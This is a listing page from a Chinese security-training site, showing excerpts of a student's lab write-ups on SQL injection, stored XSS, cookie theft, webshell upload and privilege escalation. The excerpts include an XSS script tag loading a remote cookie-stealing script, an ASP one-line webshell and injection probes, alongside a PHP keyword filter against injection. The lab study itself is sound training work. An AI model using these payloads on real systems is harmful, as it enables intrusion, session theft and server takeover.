Track 实习学员

菜刀也是刀

0关注
10粉丝
16文章
返回网站首页

您已发布 16篇文章作品写文章

【蓝胖】正式课作业 【待批改】

7ling 老师说以后把所有作业放在一个帖子里,我就放在一个帖子里了,每次在帖子里更新1.3、PHP表单验证 作业<meta charset="utf-8"><?php//简单防止SQL注入function fang_zhu_ru($sql){ //定义需要过滤的关键字 $keyword = 'select|insert|update|delete|\

 2018-7-27
 0 
 41 

【蓝胖】第六章 提权

先用菜刀进去看发现 net user 拒绝访问,什么gui输入常用 DOS命令发现也是不行猜测服务器没有CMD,那我们就自己找个经过一番苦找,在一个目录下发现,CMD,在CMD上,右键访问虚拟终端发现可以了。鸡冻啊,先创建个普通账号,有事拒绝访问使用iis6直接访问,创建成功先提升至最高管理权限去找远程端口,PID是 1600PID对应3389远程试试,找到C盘根目录,完成!

 2018-7-25
 1 
 1416 

【蓝胖】第五章 get shell

一进来就告诉你,要修改cookie还记得之前在留言板放了XSS吗,去看看管理员cookie试试插入cookie把cookie放到浏览器中成功进入后台,因为题目说要上床shell,找传点,添加产品上传自己的图片小马,<%eval request ("cc")%> 然后发现405报错,百度意思就是,说明已经上传了,但是解析出问题。看了是iis6.0的中间件,发

 2018-7-25
 0 
 1209 

【蓝胖】靶场第三章 抓包

先到这个地址里看看,http://120.203.13.75:8001/admin/Login.asp试了常用的密码进不去。。设置代理抓包,把host改成本地127.0.0.1:8080的,还是不行用ModHeader插件,将Host设置为127.0.0.1:8080,Refere设置为http://127.0.0.1/admin123/default.asp (看的老师题解。。。)然后就没有然后

 2018-7-25
 0 
 1288 

【蓝胖】靶场第四章 XSS存储型

直接给出了后台地址,试了之前密码都没用,就换个思路吧发现网站有留言板,嘿嘿,试试XSS不管了,一顿乱插提交刷新,发现有XSS漏洞的拆入存储型XSS<script src=http://t.cn/Rgdd5Y></script>提交后,就去后台等一会,发现有数据来了flag出现

 2018-7-25
 1 
 1334 

【蓝胖】靶场第二章绕wtf

第一眼进入这个网站,同学们应该干嘛? 看有没有注入点,比如主页这个地址,可能就没有随便点一个新闻 171,试试 and 1=1 结果。。试试 order by 吧,结果是 11不行,10行,说明就是10啦试试cookie提交,下载插件,说话这个插件挺好用的,嘿嘿设置cookie=id=171  访问默认网页试试显示的还是171页面,说明cookie插入成功突发奇想(嘿嘿),试试admin

 2018-7-25
 0 
 1475